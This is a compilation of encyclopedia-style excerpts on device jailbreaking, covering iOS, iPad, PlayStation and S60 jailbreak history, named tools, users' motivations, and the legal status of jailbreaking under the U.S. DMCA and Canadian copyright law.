Loading...
Articles
Privilege escalation - Jailbreaking

A jailbreak is the act or tool used to perform the act of breaking out of a chroot or jail in UNIX-like operating systems or bypassing digital rights management (DRM). In the former case, it allows the user to see files outside of the filesystem that the administrator intends to make available to the application or user in question. In the context of DRM, this allows the user to run arbitrarily defined code on devices with DRM as well as break out of chroot-like restrictions. The term originated with the iPhone/iOS jailbreaking community and has also been used as a term for PlayStation Portable hacking; these devices have repeatedly been subject to jailbreaks, allowing the execution of arbitrary code, and sometimes have had those jailbreaks disabled by vendor updates.

Privilege escalation - Jailbreaking

In the case of gaming consoles, jailbreaking is often used to execute homebrew games. In 2011, Sony, with assistance from law firm Kilpatrick Stockton, sued 21-year-old George Hotz and associates of the group fail0verflow for jailbreaking the PlayStation 3 (see Sony Computer Entertainment America v. George Hotz and PlayStation Jailbreak).

IPad - Jailbreaking

Like certain iOS devices, the iPad can be "jailbroken", depending on which version of iOS it is running, thus allowing applications and programs that are not authorized by Apple to run on the device. Once it is jailbroken, users are able to download many applications previously unavailable through the App Store via unofficial installers such as Cydia, as well as illegally pirated applications. Apple claims jailbreaking "can" void the factory warranty on the device in the United States even though jailbreaking is legal. The iPad, released in April 2010, was first jailbroken in May 2010 with the Spirit jailbreak for iOS version 3.1.2. The iPad can be jailbroken on iOS versions 4.3 through 4.3.3 with the web-based tool JailbreakMe 3.0 (released in July 2011), and on iOS versions including 5.0 and 5.0.1 using redsn0w Absinthe 2.0 was released on May 25, 2012 as the first jailbreak method for all iOS 5.1.1 devices except the 32 nm version of the iPad 2.

IOS jailbreaking - United States

The main law that affects the legality of iOS jailbreaking in the United States is the 1998 Digital Millennium Copyright Act (DMCA), which says "no person shall circumvent a technological measure that effectively controls access to a work protected under" the DMCA, since this may apply to jailbreaking. Every three years, the law allows the public to propose exemptions for legitimate reasons for circumvention, which last three years if approved. In 2010 and 2012, the U.S. Copyright Office approved exemptions that allowed smartphone users to jailbreak their devices legally, and in 2015 the Copyright Office approved an expanded exemption that also covers other all-purpose mobile computing devices, such as tablets. It is still possible Apple may employ technical countermeasures to prevent jailbreaking or prevent jailbroken phones from functioning. It is unclear whether it is legal to traffic in the tools used to make jailbreaking easy.

IOS jailbreaking - Canada

In November 2012, Canada amended its Copyright Act with new provisions prohibiting tampering with DRM protection, with exceptions including software interoperability. Jailbreaking a device to run alternative software is a form of circumventing digital locks for the purpose of software interoperability.

IOS - Jailbreaking

In 2010, the Electronic Frontier Foundation (EFF) successfully convinced the U.S. Copyright Office to allow an exemption to the general prohibition on circumvention of copyright protection systems under the Digital Millennium Copyright Act (DMCA). The exemption allows jailbreaking of iPhones for the sole purpose of allowing legally obtained applications to be added to the iPhone. The exemption does not affect the contractual relations between Apple and an iPhone owner, for example, jailbreaking voiding the iPhone warranty; however, it is solely based on Apple's discretion on whether they will fix jailbroken devices in the event that they need to be repaired. At the same time, the Copyright Office exempted unlocking an iPhone from DMCA's anticircumvention prohibitions. Unlocking an iPhone allows the iPhone to be used with any wireless carrier using the same GSM or CDMA technology for which the particular phone model was designed to operate.

Privilege escalation - Jailbreaking

A similar method of jailbreaking exists for S60 Platform smartphones, where utilities such HelloOX allow the execution of unsigned code and full access to system files. or edited firmware (similar to the M33 hacked firmware used for the PlayStation Portable) to circumvent restrictions on unsigned code. Nokia has since issued updates to curb unauthorized jailbreaking, in a manner similar to Apple.

IOS - Jailbreaking

Since the arrival of Apple's native iOS App Store, and—along with it—third-party applications, the general motives for jailbreaking have changed. People jailbreak for many different reasons, including gaining filesystem access, installing custom device themes, and modifying SpringBoard. An additional motivation is that it may enable the installation of pirated apps. On some devices, jailbreaking also makes it possible to install alternative operating systems, such as Android and the Linux kernel. Primarily, users jailbreak their devices because of the limitations of iOS. Depending on the method used, the effects of jailbreaking may be permanent or temporary.

IPad (3rd generation) - Jailbreaking

Researchers demonstrated within hours of the product release that the third-generation iPad can be "jailbroken" to use applications and programs that are not authorized by Apple. The third-generation iPad can be jailbroken with Redsn0w 0.9.12 or Absinthe 2.0. Jailbreaking violates the factory warranty. One of the main reasons for jailbreaking is to expand the feature set limited by Apple and its App Store. Most jailbreaking tools automatically install Cydia, a native iOS APT client used for finding and installing software for jailbroken iOS devices. Many apps unapproved by Apple are extensions and customizations for iOS and other apps. Users install these programs to personalize and customize the interface, adding desired features and fixing annoyances, and simplify app development by providing access to the filesystem and command-line tools. However, Apple often patches the exploits used by jailbreaking teams with iOS updates. This is why the iPad 3rd Generation is not always jailbreakable.

IOS jailbreaking - Motivations

One of the reasons for jailbreaking is to expand the feature set limited by Apple and its App Store. Apple checks apps for compliance with its iOS Developer Program License Agreement before accepting them for distribution in the App Store. However, their reasons for banning apps are not limited to safety and security and may be regarded as arbitrary and capricious. In one case, Apple mistakenly banned an app by a Pulitzer-Winning cartoonist because it violated its developer license agreement, which specifically bans apps that "contain content that ridicules public figures." To access banned apps, users rely on jailbreaking to circumvent Apple's censorship of content and features. Jailbreaking permits the downloading of programs not approved by Apple, such as user interface customization and tweaks.

IOS jailbreaking - Comparison to Android rooting

Jailbreaking of iOS devices has sometimes been compared to "rooting" of Android devices. Although both concepts involve privilege escalation, they differ in scope. Some Android devices allow users to modify or replace the operating system after unlocking the bootloader. Moreover, nearly all Android phones have an option to allow the user to install unknown, 3rd-party apps, so no exploit is needed for normal sideloading.

IOS jailbreaking - History of tools

The iPhone Dev Team, Chronic Dev Team, and pod2g collaborated to release Absinthe in January 2012, a desktop-based tool to jailbreak the iPhone 4S for the first time and the iPad 2 for the second time, on iOS 5.0.1 for both devices and also iOS 5.0 for iPhone 4S. In May 2012 it released Absinthe 2.0, which can jailbreak iOS 5.1.1 untethered on all iPhone, iPad, and iPod touch models that support iOS 5.1.1, including jailbreaking the third-generation iPad for the first time. The hackers together called the evad3rs released an iOS 6.X jailbreak tool called "evasi0n" available for Linux, OS X, and Windows on Monday, February 4, 2013 at noon Eastern Standard Time. Due to the high volume of interest in downloading the jailbreak utility, the site initially gave anticipating users download errors. When Apple upgraded its software to iOS 6.1.3 it permanently patched out the evasi0n jailbreak. In April 2013, the latest versions of Sn0wbreeze was released, which added the support for tethered jailbreaking on A4 devices (i.e. devices not newer than the iPhone 4, iPad (1st generation), or iPod touch (4th generation)).

IOS jailbreaking - History of exploit-disabling patch releases

On September 16, 2015, iOS 9 was announced and made available; it was released with a new "Rootless" security system, dubbed a "heavy blow" to the jailbreaking community.

IOS jailbreaking - History of tools

The iPhone Dev Team which is not affiliated with Apple, has released a series of free desktop-based jailbreaking tools. In July 2008 it released a version of PwnageTool to jailbreak the then new iPhone 3G on iPhone OS 2.0 as well as the iPod touch, newly including Cydia as the primary third-party installer for jailbroken software. PwnageTool continues to be updated for untethered jailbreaks of newer iOS versions.

Privilege escalation - Jailbreaking

iOS systems including the iPhone, iPad, and iPod touch have been subject to iOS jailbreaking efforts since they were released, and continuing with each firmware update. iOS jailbreaking tools include the option to install Cydia or Sileo, third-party alternatives to the App Store, as a way to find and install system tweaks and binaries. To prevent iOS jailbreaking, Apple has made the device boot ROM execute checks for SHSH blobs in order to disallow uploads of custom kernels and prevent software downgrades to earlier, jailbreakable firmware. In an "untethered" jailbreak, the iBoot environment is changed to execute a boot ROM exploit and allow submission of a patched low level bootloader or hack the kernel to submit the jailbroken kernel after the SHSH check.

IOS - Jailbreaking

Since its initial release, iOS has been subject to a variety of different hacks centered around adding functionality not allowed by Apple. Prior to the 2008 debut of Apple's native iOS App Store, the primary motive for jailbreaking was to bypass Apple's purchase mechanism for installing the App Store's native applications. Apple claimed that it will not release iOS software updates designed specifically to break these tools (other than applications that perform SIM unlocking); however, with each subsequent iOS update, previously un-patched jailbreak exploits are usually patched.

IOS jailbreaking - United States

In 2010, Apple announced that jailbreaking "can violate the warranty". This may be affected by the Magnuson-Moss Warranty Act of 1975.

IOS jailbreaking - Canada

There had been several efforts from 2008–2011 to amend the Copyright Act (Bill C-60, Bill C-61, and Bill C-32) to prohibit tampering with digital locks, along with initial proposals for C-11 that were more restrictive, but those bills were set aside. In 2011, Michael Geist, a Canadian copyright scholar, cited iPhone jailbreaking as a non-copyright-related activity that overly-broad Copyright Act amendments could prohibit.

IOS jailbreaking - Digital Millennium Copyright Act exemptions

In 2007, Tim Wu, a professor at Columbia Law School, argued that jailbreaking "Apple's superphone is legal, ethical, and just plain fun." Wu cited an explicit exemption issued by the Library of Congress in 2006 for personal carrier unlocking, which notes that locks "are used by wireless carriers to limit the ability of subscribers to switch to other carriers, a business decision that has nothing whatsoever to do with the interests protected by copyright" and thus do not implicate the DMCA. Wu did not claim that this exemption applies to those who help others unlock a device or "traffic" in software to do so.

IOS jailbreaking - Digital Millennium Copyright Act exemptions

In 2010, in response to a request by the Electronic Frontier Foundation, the U.S. Copyright Office explicitly recognized an exemption to the DMCA to permit jailbreaking in order to allow iPhone owners to use their phones with applications that are not available from Apple's store, and to unlock their iPhones for use with unapproved carriers. Apple had previously filed comments opposing this exemption and indicated that it had considered jailbreaking to be a violation of copyright (and by implication prosecutable under the DMCA). Apple's request to define copyright law to include jailbreaking as a violation was denied as part of the 2009 DMCA rulemaking. In their ruling, the Library of Congress affirmed on July 26, 2010 that jailbreaking is exempt from DMCA rules with respect to circumventing digital locks. DMCA exemptions must be reviewed and renewed every three years or else they expire.

Loading...